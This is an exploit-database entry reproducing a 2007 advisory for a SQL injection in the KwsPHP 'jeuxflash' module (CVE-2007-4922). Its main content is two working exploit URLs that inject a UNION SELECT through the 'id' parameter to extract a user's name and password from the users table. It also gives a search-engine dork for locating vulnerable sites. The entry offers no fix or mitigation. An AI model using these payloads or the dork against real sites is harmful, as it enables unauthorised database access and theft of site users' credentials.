KwsPHP Module jeuxflash 1.0 id Remote SQL Injection Vulnerability

2007-09-13T00:00:00
ID EDB-ID:4400
Type exploitdb
Reporter Houssamix
Modified 2007-09-13T00:00:00

Description

KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability. CVE-2007-4922. Webapps exploit for php platform

                                        
                                            #########################################################################
KwsPHP  Module   ( jeuxflash )    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.fr & http://no-hack.net


## Site:
http://koogar.alorys-hebergement.com/kwsphp/index.php?mod=downloads&filedl=30&before=8&p_dl=1
## Dork : inurl:index.php?mod=jeuxflash


## EXPLOITS :

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pseudo,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pass,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--


## Note
you must register first



## GREETZ  :  CoNaN , hell15 , RachiDox , Mr Al3FriTe , muslim4ever , DDoS

#########################################################################
KwsPHP  Module   ( jeuxflash )    Remote SQL Injection Vulnerability
#########################################################################

# milw0rm.com [2007-09-13]